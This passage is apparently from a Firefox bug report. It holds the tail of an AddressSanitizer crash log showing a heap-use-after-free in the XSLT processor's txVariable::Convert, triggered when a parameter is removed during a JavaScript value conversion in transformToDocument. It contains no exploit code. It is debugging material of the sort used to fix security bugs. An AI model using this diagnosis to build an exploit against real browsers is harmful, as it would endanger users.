    #35 0x7ffe4b48986d in mozilla::ipc::MessagePump::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #36 0x7ffe4b39a125 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #37 0x7ffe4b399ef5 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #38 0x7ffe5354606a in nsBaseAppShell::Run /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137
    #39 0x7ffe5372c29b in nsAppShell::Run /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:605
    #40 0x7ffe57dc68f4 in XRE_RunAppShell /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:878
    #41 0x7ffe4b39a125 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #42 0x7ffe4b399ef5 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #43 0x7ffe57dc5e15 in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:715
    #44 0x7ff685b9208c in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327
    #45 0x7ff685b917ad in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:147
    #46 0x7ff685c8e757 in __scrt_common_main_seh d:\agent\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #47 0x7ffef2fe7033 in BaseThreadInitThunk+0x13 (C:\Windows\System32\KERNEL32.DLL+0x180017033)
    #48 0x7ffef3ce2650 in RtlUserThreadStart+0x20 (C:\Windows\SYSTEM32\ntdll.dll+0x180052650)

0x12233621cfa0 is located 16 bytes inside of 24-byte region [0x12233621cf90,0x12233621cfa8)
freed by thread T0 here:
    #0 0x7ffebc467cdb in free /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:82
    #1 0x7ffe52ddd54b in txVariable::~txVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:199
    #2 0x7ffe52dd4309 in txMozillaXSLTProcessor::RemoveParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:964
    #3 0x7ffe4f61aaa9 in mozilla::dom::XSLTProcessor_Binding::removeParameter /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:367
    #4 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #5 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #6 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #7 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #8 0x7ffe580b4b13 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:544
    #9 0x7ffe580b772e in js::Call /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:589
    #10 0x7ffe5841488f in js::ToPrimitiveSlow /builds/worker/checkouts/gecko/js/src/vm/JSObject.cpp:2402
    #11 0x7ffe58778172 in js::ToStringSlow<js::CanGC> /builds/worker/checkouts/gecko/js/src/vm/StringType.cpp:2185
    #12 0x7ffe52dd7593 in txVariable::Convert /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1355
    #13 0x7ffe52ddd5d3 in txVariable::getValue /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:211
    #14 0x7ffe52d97ccf in txExecutionState::getVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txExecutionState.cpp:215
    #15 0x7ffe52d81c38 in VariableRefExpr::evaluate /builds/worker/checkouts/gecko/dom/xslt/xpath/txVariableRefExpr.cpp:35
    #16 0x7ffe52daf27c in txValueOf::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txInstructions.cpp:747
    #17 0x7ffe52e06791 in txXSLTProcessor::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txXSLTProcessor.cpp:46
    #18 0x7ffe52dd0402 in txMozillaXSLTProcessor::TransformToDoc /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:654
    #19 0x7ffe52dcfb4c in txMozillaXSLTProcessor::TransformToDocument /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:533
    #20 0x7ffe4f6186cd in mozilla::dom::XSLTProcessor_Binding::transformToDocument /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:208
    #21 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #22 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #23 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #24 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #25 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #26 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #27 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515

previously allocated by thread T0 here:
    #0 0x7ffebc467deb in malloc /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:98
    #1 0x7ffec314134d in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52
    #2 0x7ffe52dd21d0 in txMozillaXSLTProcessor::SetParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:920
    #3 0x7ffe52dd5ce7 in txMozillaXSLTProcessor::SetParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1210
    #4 0x7ffe4f61948b in mozilla::dom::XSLTProcessor_Binding::setParameter /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:263
    #5 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #6 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #7 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #8 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #9 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #10 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #11 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515
    #12 0x7ffe582ade9a in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:539
    #13 0x7ffe4d880625 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:296
    #14 0x7ffe530418d7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2180
    #15 0x7ffe5303f8b0 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2048
    #16 0x7ffe530376ee in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1704
    #17 0x7ffe5303313e in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1147
    #18 0x7ffe5301e943 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:858
    #19 0x7ffe5301d9d6 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:118
    #20 0x7ffe4c59da53 in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:897
    #21 0x7ffe4c597a46 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:690
    #22 0x7ffe4c5a5257 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:173
    #23 0x7ffe49f9aff6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:140
    #24 0x7ffe49ffe5dd in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:467
    #25 0x7ffe49fb3381 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:770
    #26 0x7ffe49faf8dc in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:606
    #27 0x7ffe49fb02a4 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert
Shadow bytes around the buggy address:
  0x04619cdc39a0: fd fd fa fa fd fd fd fd fa fa 00 00 00 00 fa fa
  0x04619cdc39b0: 00 00 00 00 fa fa fd fd fd fd fa fa 00 00 00 fa
  0x04619cdc39c0: fa fa 00 00 00 fa fa fa 00 00 00 00 fa fa 00 00
  0x04619cdc39d0: 00 00 fa fa 00 00 00 00 fa fa fd fd fd fd fa fa
  0x04619cdc39e0: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 fa
=>0x04619cdc39f0: fa fa fd fd[fd]fa fa fa fd fd fd fd fa fa 00 00
  0x04619cdc3a00: 00 00 fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
  0x04619cdc3a10: 00 00 00 00 fa fa 00 00 00 00 fa fa fd fd fd fd
  0x04619cdc3a20: fa fa 00 00 00 00 fa fa 00 00 00 fa fa fa 00 00
  0x04619cdc3a30: 00 00 fa fa fd fd fd fa fa fa fd fd fd fd fa fa
  0x04619cdc3a40: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==15704==ABORTING
```
